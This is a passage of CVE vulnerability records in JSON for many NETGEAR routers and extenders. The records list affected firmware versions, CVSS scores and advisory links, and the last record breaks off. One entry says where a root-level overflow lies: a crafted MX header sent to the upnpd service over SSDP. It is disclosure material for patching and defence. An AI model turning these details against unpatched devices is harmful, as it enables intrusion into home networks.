Certain NETGEAR devices are affected by disclosure of sensitive information. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.58, D6200 before 1.1.00.30, D6220 before 1.0.0.46, D6400 before 1.0.0.82, D7000 before 1.0.1.68, D7000v2 before 1.0.0.51, D7800 before 1.0.1.42, D8500 before 1.0.3.42, DC112A before 1.0.0.40, DGN2200Bv4 before 1.0.0.102, DGN2200v4 before 1.0.0.102, JNR1010v2 before 1.1.0.54, JR6150 before 1.0.1.18, JWNR2010v5 before 1.1.0.54, PR2000 before 1.0.0.24, R6020 before 1.0.0.34, R6050 before 1.0.1.18, R6080 before 1.0.0.34, R6100 before 1.0.1.22, R6120 before 1.0.0.42, R6220 before 1.1.0.68, R6250 before 1.0.4.30, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.60, R6700 before 1.0.1.48, R6700v2 before 1.2.0.24, R6800 before 1.2.0.24, R6900 before 1.0.1.48, R6900P before 1.3.1.44, R6900v2 before 1.2.0.24, R7000 before 1.0.9.34, R7000P before 1.3.1.44, R7100LG before 1.0.0.48, R7300 before 1.0.0.68, R7500 before 1.0.0.124, R7500v2 before 1.0.3.38, R7900 before 1.0.2.16, R7900P before 1.4.1.24, R8000 before 1.0.4.18, R8000P before 1.4.1.24, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN3000RP before 1.0.0.68, WN3000RPv2 before 1.0.0.68, WNDR3400v3 before 1.0.1.18, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.56, WNDR4500v3 before 1.0.0.56, WNR1000v4 before 1.1.0.54, WNR2020 before 1.1.0.54, WNR2050 before 1.1.0.54, and WNR3500Lv2 before 1.2.0.54.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T12:26:37.327Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000060220/Security-Advisory-for-Sensitive-Information-Disclosure-on-Some-Routers-and-Smart-Cradles-PSV-2017-2198"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-25T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by disclosure of sensitive information. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.58, D6200 before 1.1.00.30, D6220 before 1.0.0.46, D6400 before 1.0.0.82, D7000 before 1.0.1.68, D7000v2 before 1.0.0.51, D7800 before 1.0.1.42, D8500 before 1.0.3.42, DC112A before 1.0.0.40, DGN2200Bv4 before 1.0.0.102, DGN2200v4 before 1.0.0.102, JNR1010v2 before 1.1.0.54, JR6150 before 1.0.1.18, JWNR2010v5 before 1.1.0.54, PR2000 before 1.0.0.24, R6020 before 1.0.0.34, R6050 before 1.0.1.18, R6080 before 1.0.0.34, R6100 before 1.0.1.22, R6120 before 1.0.0.42, R6220 before 1.1.0.68, R6250 before 1.0.4.30, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.60, R6700 before 1.0.1.48, R6700v2 before 1.2.0.24, R6800 before 1.2.0.24, R6900 before 1.0.1.48, R6900P before 1.3.1.44, R6900v2 before 1.2.0.24, R7000 before 1.0.9.34, R7000P before 1.3.1.44, R7100LG before 1.0.0.48, R7300 before 1.0.0.68, R7500 before 1.0.0.124, R7500v2 before 1.0.3.38, R7900 before 1.0.2.16, R7900P before 1.4.1.24, R8000 before 1.0.4.18, R8000P before 1.4.1.24, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN3000RP before 1.0.0.68, WN3000RPv2 before 1.0.0.68, WNDR3400v3 before 1.0.1.18, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.56, WNDR4500v3 before 1.0.0.56, WNR1000v4 before 1.1.0.54, WNR2020 before 1.1.0.54, WNR2050 before 1.1.0.54, and WNR3500Lv2 before 1.2.0.54."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:H/I:L/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-23T20:12:33",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000060220/Security-Advisory-for-Sensitive-Information-Disclosure-on-Some-Routers-and-Smart-Cradles-PSV-2017-2198"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-21139",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by disclosure of sensitive information. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.58, D6200 before 1.1.00.30, D6220 before 1.0.0.46, D6400 before 1.0.0.82, D7000 before 1.0.1.68, D7000v2 before 1.0.0.51, D7800 before 1.0.1.42, D8500 before 1.0.3.42, DC112A before 1.0.0.40, DGN2200Bv4 before 1.0.0.102, DGN2200v4 before 1.0.0.102, JNR1010v2 before 1.1.0.54, JR6150 before 1.0.1.18, JWNR2010v5 before 1.1.0.54, PR2000 before 1.0.0.24, R6020 before 1.0.0.34, R6050 before 1.0.1.18, R6080 before 1.0.0.34, R6100 before 1.0.1.22, R6120 before 1.0.0.42, R6220 before 1.1.0.68, R6250 before 1.0.4.30, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.60, R6700 before 1.0.1.48, R6700v2 before 1.2.0.24, R6800 before 1.2.0.24, R6900 before 1.0.1.48, R6900P before 1.3.1.44, R6900v2 before 1.2.0.24, R7000 before 1.0.9.34, R7000P before 1.3.1.44, R7100LG before 1.0.0.48, R7300 before 1.0.0.68, R7500 before 1.0.0.124, R7500v2 before 1.0.3.38, R7900 before 1.0.2.16, R7900P before 1.4.1.24, R8000 before 1.0.4.18, R8000P before 1.4.1.24, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN3000RP before 1.0.0.68, WN3000RPv2 before 1.0.0.68, WNDR3400v3 before 1.0.1.18, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.56, WNDR4500v3 before 1.0.0.56, WNR1000v4 before 1.1.0.54, WNR2020 before 1.1.0.54, WNR2050 before 1.1.0.54, and WNR3500Lv2 before 1.2.0.54."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "NONE",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:H/I:L/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000060220/Security-Advisory-for-Sensitive-Information-Disclosure-on-Some-Routers-and-Smart-Cradles-PSV-2017-2198",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000060220/Security-Advisory-for-Sensitive-Information-Disclosure-on-Some-Routers-and-Smart-Cradles-PSV-2017-2198"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-21139",
"datePublished": "2020-04-23T20:12:33",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T12:26:37.327Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-21134
Vulnerability from cvelistv5
Published
2020-04-23 20:00
Modified
2024-08-05 12:19
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects R6700 before 1.0.1.48, R7900 before 1.0.2.16, R6900 before 1.0.1.48, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R6250 before 1.0.4.30, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.60, R7000 before 1.0.9.34, R7100LG before 1.0.0.48, R7300 before 1.0.0.68, R8000 before 1.0.4.18, R8000P before 1.4.1.24, R7900P before 1.4.1.24, R8500 before 1.0.2.122, R8300 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, EX3700 before 1.0.0.72, EX3800 before 1.0.0.72, EX6000 before 1.0.0.32, EX6100 before 1.0.2.24, EX6120 before 1.0.0.42, EX6130 before 1.0.0.24, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, D7000v2 before 1.0.0.51, D6220 before 1.0.0.46, D6400 before 1.0.0.82, and D8500 before 1.0.3.42.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T12:19:27.626Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000060226/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Wireless-Extenders-PSV-2017-2019"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-26T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects R6700 before 1.0.1.48, R7900 before 1.0.2.16, R6900 before 1.0.1.48, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R6250 before 1.0.4.30, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.60, R7000 before 1.0.9.34, R7100LG before 1.0.0.48, R7300 before 1.0.0.68, R8000 before 1.0.4.18, R8000P before 1.4.1.24, R7900P before 1.4.1.24, R8500 before 1.0.2.122, R8300 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, EX3700 before 1.0.0.72, EX3800 before 1.0.0.72, EX6000 before 1.0.0.32, EX6100 before 1.0.2.24, EX6120 before 1.0.0.42, EX6130 before 1.0.0.24, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, D7000v2 before 1.0.0.51, D6220 before 1.0.0.46, D6400 before 1.0.0.82, and D8500 before 1.0.3.42."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:L/C:H/I:L/PR:L/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-23T20:00:55",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000060226/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Wireless-Extenders-PSV-2017-2019"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-21134",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects R6700 before 1.0.1.48, R7900 before 1.0.2.16, R6900 before 1.0.1.48, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R6250 before 1.0.4.30, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.60, R7000 before 1.0.9.34, R7100LG before 1.0.0.48, R7300 before 1.0.0.68, R8000 before 1.0.4.18, R8000P before 1.4.1.24, R7900P before 1.4.1.24, R8500 before 1.0.2.122, R8300 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, EX3700 before 1.0.0.72, EX3800 before 1.0.0.72, EX6000 before 1.0.0.32, EX6100 before 1.0.2.24, EX6120 before 1.0.0.42, EX6130 before 1.0.0.24, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, D7000v2 before 1.0.0.51, D6220 before 1.0.0.46, D6400 before 1.0.0.82, and D8500 before 1.0.3.42."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "LOW",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:L/C:H/I:L/PR:L/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000060226/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Wireless-Extenders-PSV-2017-2019",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000060226/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Wireless-Extenders-PSV-2017-2019"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-21134",
"datePublished": "2020-04-23T20:00:55",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T12:19:27.626Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2021-38514
Vulnerability from cvelistv5
Published
2021-08-10 23:54
Modified
2024-08-04 01:44
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by authentication bypass. This affects D3600 before 1.0.0.72, D6000 before 1.0.0.72, D6100 before 1.0.0.63, D6200 before 1.1.00.34, D6220 before 1.0.0.48, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.52, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.108, DGND2200Bv4 before 1.0.0.108, EX2700 before 1.0.1.48, EX3700 before 1.0.0.76, EX3800 before 1.0.0.76, EX6000 before 1.0.0.38, EX6100 before 1.0.2.24, EX6100v2 before 1.0.1.76, EX6120 before 1.0.0.42, EX6130 before 1.0.0.28, EX6150v1 before 1.0.0.42, EX6150v2 before 1.0.1.76, EX6200 before 1.0.3.88, EX6200v2 before 1.0.1.72, EX6400 before 1.0.2.136, EX7000 before 1.0.0.66, EX7300 before 1.0.2.136, EX8000 before 1.0.1.180, RBK50 before 2.1.4.10, RBR50 before 2.1.4.10, RBS50 before 2.1.4.10, RBK40 before 2.1.4.10, RBR40 before 2.1.4.10, RBS40 before 2.1.4.10, RBW30 before 2.2.1.204, PR2000 before 1.0.0.28, R6020 before 1.0.0.38, R6080 before 1.0.0.38, R6050 before 1.0.1.18, JR6150 before 1.0.1.18, R6120 before 1.0.0.46, R6220 before 1.1.0.86, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.62, R6700 before 1.0.1.48, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900v2 before 1.2.0.36, R6900 before 1.0.1.48, R7000 before 1.0.9.34, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.48, R7300DST before 1.0.0.70, R7500v2 before 1.0.3.38, R7800 before 1.0.2.52, R7900 before 1.0.3.8, R8000 before 1.0.4.28, R7900P before 1.4.1.30, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, R9000 before 1.0.3.10, RBS40V before 2.2.0.58, RBK50V before 2.2.0.58, WN2000RPTv3 before 1.0.1.32, WN2500RPv2 before 1.0.1.54, WN3000RPv3 before 1.0.2.78, WN3100RPv2 before 1.0.0.66, WNDR3400v3 before 1.0.1.22, WNDR3700v4 before 1.0.2.102, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.56, WNDR4500v3 before 1.0.0.56, WNR2000v5 (R2000) before 1.0.0.66, WNR2020 before 1.1.0.62, WNR2050 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.22.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T01:44:23.472Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://kb.netgear.com/000063757/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-Extenders-and-WiFi-Systems-PSV-2017-2449"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by authentication bypass. This affects D3600 before 1.0.0.72, D6000 before 1.0.0.72, D6100 before 1.0.0.63, D6200 before 1.1.00.34, D6220 before 1.0.0.48, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.52, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.108, DGND2200Bv4 before 1.0.0.108, EX2700 before 1.0.1.48, EX3700 before 1.0.0.76, EX3800 before 1.0.0.76, EX6000 before 1.0.0.38, EX6100 before 1.0.2.24, EX6100v2 before 1.0.1.76, EX6120 before 1.0.0.42, EX6130 before 1.0.0.28, EX6150v1 before 1.0.0.42, EX6150v2 before 1.0.1.76, EX6200 before 1.0.3.88, EX6200v2 before 1.0.1.72, EX6400 before 1.0.2.136, EX7000 before 1.0.0.66, EX7300 before 1.0.2.136, EX8000 before 1.0.1.180, RBK50 before 2.1.4.10, RBR50 before 2.1.4.10, RBS50 before 2.1.4.10, RBK40 before 2.1.4.10, RBR40 before 2.1.4.10, RBS40 before 2.1.4.10, RBW30 before 2.2.1.204, PR2000 before 1.0.0.28, R6020 before 1.0.0.38, R6080 before 1.0.0.38, R6050 before 1.0.1.18, JR6150 before 1.0.1.18, R6120 before 1.0.0.46, R6220 before 1.1.0.86, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.62, R6700 before 1.0.1.48, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900v2 before 1.2.0.36, R6900 before 1.0.1.48, R7000 before 1.0.9.34, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.48, R7300DST before 1.0.0.70, R7500v2 before 1.0.3.38, R7800 before 1.0.2.52, R7900 before 1.0.3.8, R8000 before 1.0.4.28, R7900P before 1.4.1.30, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, R9000 before 1.0.3.10, RBS40V before 2.2.0.58, RBK50V before 2.2.0.58, WN2000RPTv3 before 1.0.1.32, WN2500RPv2 before 1.0.1.54, WN3000RPv3 before 1.0.2.78, WN3100RPv2 before 1.0.0.66, WNDR3400v3 before 1.0.1.22, WNDR3700v4 before 1.0.2.102, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.56, WNDR4500v3 before 1.0.0.56, WNR2000v5 (R2000) before 1.0.0.66, WNR2020 before 1.1.0.62, WNR2050 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.22."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 2.4,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AC:L/AV:A/A:N/C:L/I:N/PR:H/S:U/UI:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-08-10T23:54:27",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://kb.netgear.com/000063757/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-Extenders-and-WiFi-Systems-PSV-2017-2449"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-38514",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by authentication bypass. This affects D3600 before 1.0.0.72, D6000 before 1.0.0.72, D6100 before 1.0.0.63, D6200 before 1.1.00.34, D6220 before 1.0.0.48, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.52, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.108, DGND2200Bv4 before 1.0.0.108, EX2700 before 1.0.1.48, EX3700 before 1.0.0.76, EX3800 before 1.0.0.76, EX6000 before 1.0.0.38, EX6100 before 1.0.2.24, EX6100v2 before 1.0.1.76, EX6120 before 1.0.0.42, EX6130 before 1.0.0.28, EX6150v1 before 1.0.0.42, EX6150v2 before 1.0.1.76, EX6200 before 1.0.3.88, EX6200v2 before 1.0.1.72, EX6400 before 1.0.2.136, EX7000 before 1.0.0.66, EX7300 before 1.0.2.136, EX8000 before 1.0.1.180, RBK50 before 2.1.4.10, RBR50 before 2.1.4.10, RBS50 before 2.1.4.10, RBK40 before 2.1.4.10, RBR40 before 2.1.4.10, RBS40 before 2.1.4.10, RBW30 before 2.2.1.204, PR2000 before 1.0.0.28, R6020 before 1.0.0.38, R6080 before 1.0.0.38, R6050 before 1.0.1.18, JR6150 before 1.0.1.18, R6120 before 1.0.0.46, R6220 before 1.1.0.86, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.62, R6700 before 1.0.1.48, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900v2 before 1.2.0.36, R6900 before 1.0.1.48, R7000 before 1.0.9.34, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.48, R7300DST before 1.0.0.70, R7500v2 before 1.0.3.38, R7800 before 1.0.2.52, R7900 before 1.0.3.8, R8000 before 1.0.4.28, R7900P before 1.4.1.30, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, R9000 before 1.0.3.10, RBS40V before 2.2.0.58, RBK50V before 2.2.0.58, WN2000RPTv3 before 1.0.1.32, WN2500RPv2 before 1.0.1.54, WN3000RPv3 before 1.0.2.78, WN3100RPv2 before 1.0.0.66, WNDR3400v3 before 1.0.1.22, WNDR3700v4 before 1.0.2.102, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.56, WNDR4500v3 before 1.0.0.56, WNR2000v5 (R2000) before 1.0.0.66, WNR2020 before 1.1.0.62, WNR2050 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.22."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "NONE",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AC:L/AV:A/A:N/C:L/I:N/PR:H/S:U/UI:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000063757/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-Extenders-and-WiFi-Systems-PSV-2017-2449",
"refsource": "MISC",
"url": "https://kb.netgear.com/000063757/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-Extenders-and-WiFi-Systems-PSV-2017-2449"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-38514",
"datePublished": "2021-08-10T23:54:27",
"dateReserved": "2021-08-10T00:00:00",
"dateUpdated": "2024-08-04T01:44:23.472Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2021-27239
Vulnerability from cvelistv5
Published
2021-03-29 21:05
Modified
2024-08-03 20:48
Severity ?
EPSS score ?
Summary
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6400 and R6700 firmware version 1.0.4.98 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the upnpd service, which listens on UDP port 1900 by default. A crafted MX header field in an SSDP message can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-11851.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| NETGEAR | Multiple Routers |
Version: firmware version 1.0.4.98 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:48:16.140Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-21-206/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://kb.netgear.com/000062820/Security-Advisory-for-Stack-based-Buffer-Overflow-Remote-Code-Execution-Vulnerability-on-Some-Routers-PSV-2020-0432"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Multiple Routers",
"vendor": "NETGEAR",
"versions": [
{
"status": "affected",
"version": "firmware version 1.0.4.98"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Anonymous"
}
],
"descriptions": [
{
"lang": "en",
"value": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6400 and R6700 firmware version 1.0.4.98 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the upnpd service, which listens on UDP port 1900 by default. A crafted MX header field in an SSDP message can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-11851."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-121",
"description": "CWE-121: Stack-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-03-29T21:05:29",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-21-206/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://kb.netgear.com/000062820/Security-Advisory-for-Stack-based-Buffer-Overflow-Remote-Code-Execution-Vulnerability-on-Some-Routers-PSV-2020-0432"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "zdi-disclosures@trendmicro.com",
